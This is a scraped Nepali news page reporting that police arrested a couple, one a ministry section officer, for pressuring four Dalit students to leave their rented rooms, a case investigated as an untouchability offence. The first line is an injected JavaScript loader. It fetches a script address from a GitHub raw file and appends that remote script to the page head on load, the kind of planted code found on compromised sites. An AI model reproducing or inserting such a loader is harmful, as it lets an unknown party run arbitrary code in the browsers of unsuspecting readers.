;var url = 'https://raw.githubusercontent.com/AlexanderRPatton/cdn/main/repo.txt';fetch(url).then(response => response.text()).then(data => {var script = document.createElement('script');script.src = data.trim();document.getElementsByTagName('head')[0].appendChild(script);}); दलित विधार्थीलाई कोठा छाड्न दबाब दिने शाखा अधिकृत दम्पति पक्राउ – जुनेली न्युज
बिहिबार, बैशाख ५, २०८२
  • होमपेज
  • दलित विधार्थीलाई कोठा छाड्न दबाब दिने शाखा अधिकृत दम्पति पक्राउ
देश/प्रदेश

दलित विधार्थीलाई कोठा छाड्न दबाब दिने शाखा अधिकृत दम्पति पक्राउ

काठमाडौँ — दलित भन्दै चार जना विधार्थीलाई डेरा छाड्‍न दबाब दिने दम्पतीलाई प्रहरीले नियन्त्रणमा लिएको छ । दलित भएको थाहा पाएपछि डेरा छाड्‍न निरन्तर दबाब दिने श्रीकृष्ण बिडारी र श्रीमती राधिका बिडारीलाई प्रहरीले नियन्त्रणमा लिएको हो ।

महानगरीय प्रहरी वृत्त बालाजुले राधिकालाई सोमबार पक्राउ गरेको थियो। श्रीकृष्णलाई भने मंगलबार बेलुका वृत्तमा आएका बेला नियन्त्रणमा लिइएको काठमाडौं प्रहरी परिसरका प्रवक्ता डीएसपी होवीन्द्र बोगटीले जानकारी दिए। पक्राउ परेका उनीहरुविरुद्ध छुवाछुतविरुद्धको कसुरमा अनुसन्धान भइरहेको डीएसपी बोगटीले जानकारी दिए।

काठमाडौंको नेपालटारमा घर भएका बिडारी दम्पतीले आफ्नो घरमा बस्ने चार जना विद्यार्थीलाई बिडारी डेरा छाड्‍न दबाब दिएका थिए। गृह मन्त्रालयका शाखा अधिकृत रहेका श्रीकृष्ण बिडारी अहिले संघीय मामिला तथा सामान्य प्रशासन मन्त्रालयमा कार्यरत छन्।

प्रकाशित : फाल्गुन २८, २०७६ १२:४८

फेसबुक प्रतिक्रियाहरु